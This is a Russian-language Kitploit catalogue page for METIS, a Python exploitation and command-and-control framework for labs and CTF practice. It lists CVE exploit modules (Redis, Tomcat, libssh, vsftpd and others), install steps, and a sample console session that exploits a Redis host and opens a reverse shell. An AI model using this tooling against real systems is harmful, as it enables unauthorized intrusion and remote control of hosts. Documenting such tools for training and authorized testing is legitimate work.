Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
METIS — Модульный фреймворк для эксплуатации на Python с консолью в стиле Metasploit, автоматической регистрацией модулей Exploit и Auxiliary, трёхсостоятельными проверками и множеством транспортных механизмов сессий для лабораторных и CTF-целей. | Kitploit
Инструменты/GitHubGitHub/k3ystr0k3r/metis
Фреймворки для пентестаСканеры уязвимостейФреймворки для эксплойтовЭксплуатацияПост-эксплуатацияCTFТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
3618 ч 22 мин назадЕщё не проверено
GitHubk3ystr0k3r/metis

METIS

Модульный фреймворк для эксплуатации на Python с консолью в стиле Metasploit, автоматической регистрацией модулей Exploit и Auxiliary, трёхсостоятельными проверками и множеством транспортных механизмов сессий для лабораторных и CTF-целей.

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

METIS - Модульный фреймворк для эксплуатации и анализа угроз

███╗   ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗     ██║   ██║███████╗
██║╚██╔╝██║██╔══╝     ██║   ██║╚════██║
██║ ╚═╝ ██║███████╗   ██║   ██║███████║
╚═╝     ╚═╝╚══════╝   ╚═╝   ╚═╝╚══════╝

Фреймворк для эксплуатации на Python, созданный для обучения. Модульная архитектура, тематизированная консоль, несколько транспортных протоколов для сессий и растущая библиотека модулей CVE.


Управляется сообществом

METIS — это фреймворк для исследований в области безопасности, управляемый сообществом. Цель — создать растущую коллекцию модулей, предоставленных исследователями в области безопасности, разработчиками и широким сообществом.

Есть полезный сканер, вспомогательный модуль, модуль эксплойта или другой инструмент для исследований в области безопасности, которым вы хотели бы поделиться? Добавьте его в METIS и откройте Pull Request.

Все вклады приветствуются при условии, что они соответствуют структуре модулей проекта, стандартам кодирования и правилам авторизованного использования.

Независимо от того, добавляете ли вы новый модуль CVE, улучшаете существующий модуль, исправляете ошибку или создаёте новую функциональность фреймворка, ваш вклад может помочь сделать METIS лучше для всех.

См. Написание модулей ниже для получения информации о создании собственного модуля.


Что это такое

METIS — это модульный фреймворк для C2/эксплуатации, написанный на Python. Он запускает интерактивную консоль в стиле Metasploit, где вы выбираете модули, задаёте параметры, запускаете проверки и получаете сессии на лабораторных целях.

Он предназначен для:

  • Обучения тому, как фреймворки для эксплуатации работают изнутри
  • Лабораторной работы с уязвимыми виртуальными машинами и контейнерами
  • Практики CTF, где скриптуемый фреймворк быстрее ручных инструментов
  • Вкладов сообщества через пользовательские модули и улучшения фреймворка

Он не предназначен для:

  • Атаки на системы, которыми вы не владеете или на тестирование которых у вас нет письменного разрешения
  • Продакшн-задач red team (используйте Cobalt Strike, Sliver или Mythic)
  • Чего-либо в публичном интернете

Возможности

  • Модульная архитектура — поместите файл .py в modules/, и он автоматически зарегистрируется
  • Два типа модулей — Exploit (создаёт сессии) и Auxiliary (сканеры, перечислители)
  • Трёхсостояние check() — каждый модуль может проверить перед атакой (VULNERABLE / SAFE / UNKNOWN)
  • Несколько транспортных протоколов для сессий — обратные сокеты, привязочные сокеты, каналы paramiko, HTTP веб-оболочки, сырой telnet
  • Многопоточное сканирование — спецификации целей в виде CIDR/списка через запятую/диапазона/file: с живыми индикаторами прогресса
  • Тематизированная консоль — 22 встроенные цветовые схемы с градиентами индикаторов прогресса для каждой темы
  • Автоматизация через RC-файлы — скриптуйте целые рабочие процессы
  • Файлы SOURCE для каждого модуля — загружайте параметры из файлов KEY=VALUE
  • Локальный выход в оболочку — запускайте любую команду оболочки, не покидая фреймворк
  • Минимальное ядро — намеренно минимальные зависимости и абстракции

Модули

Auxiliary — сканеры и перечислители

МодульОписание
auxiliary/scanner/tcp_connectМногопоточный сканер TCP-портов
auxiliary/scanner/hikvision_cve_2017_7921Обход аутентификации IP-камер Hikvision + перечисление пользователей
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847Утечка учётных данных MikroTik WinBox
auxiliary/scanner/redis_cve_2022_0543Детектор побега из песочницы Lua в Redis

Эксплойты — создающие сессии

МодульТип сессии
exploit/unix/ftp/vsftpd_234_backdoorПривязочный сокет
exploit/multi/http/ghost_cms_handlebars_rceОбратный сокет
exploit/multi/http/langflow_rce_cve_2026_9198Обратный сокет
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816Обратный сокет
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197Обратный сокет
exploit/multi/http/tomcat_put_rce_cve_2017_12615Обратный сокет
exploit/multi/http/joomla_jce_rce_cve_2026_48907HTTP веб-оболочка
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819Отложенный обратный (cron)
exploit/linux/redis/redis_cve_2022_0543_rceОбратный сокет
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933Канал Paramiko
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061Сырой telnet-сокет

Установка

Требуется Python 3.10+ и git.

git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS

python3 -m venv .venv
source .venv/bin/activate

pip install -r requirements.txt

requirements.txt:

pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43

Запуск:

python3 metis.py

Использование

metis > show modules

  #    Module                                                        Date        Rank       Chk  Description
  --   ------------------------------------------------------------  ----------  ---------  ---  -----------
  1    auxiliary/scanner/hikvision_cve_2017_7921                     2017-09-23  normal     Yes  Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
  2    auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847        2018-08-01  great      Yes  MikroTik WinBox Credential Leak (CVE-2018-14847)
  ...
  15   exploit/unix/ftp/vsftpd_234_backdoor                          2011-07-03  excellent  Yes  vsftpd 2.3.4 Backdoor Command Execution

metis > search redis

  #   Module                                       Date        Rank       Chk  Description
  --  ------                                       ----       ----       ---  -----------
  1   auxiliary/scanner/redis_cve_2022_0543        2022-02-18  excellent  Yes  Redis CVE-2022-0543 Scanner
  2   exploit/linux/redis/redis_cve_2022_0543_rce  2022-02-18  excellent  Yes  Redis CVE-2022-0543 Lua Sandbox Escape RCE

metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>

metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
  a3f2b1c4  192.168.56.101:51234  (alive)
Скачать инструмент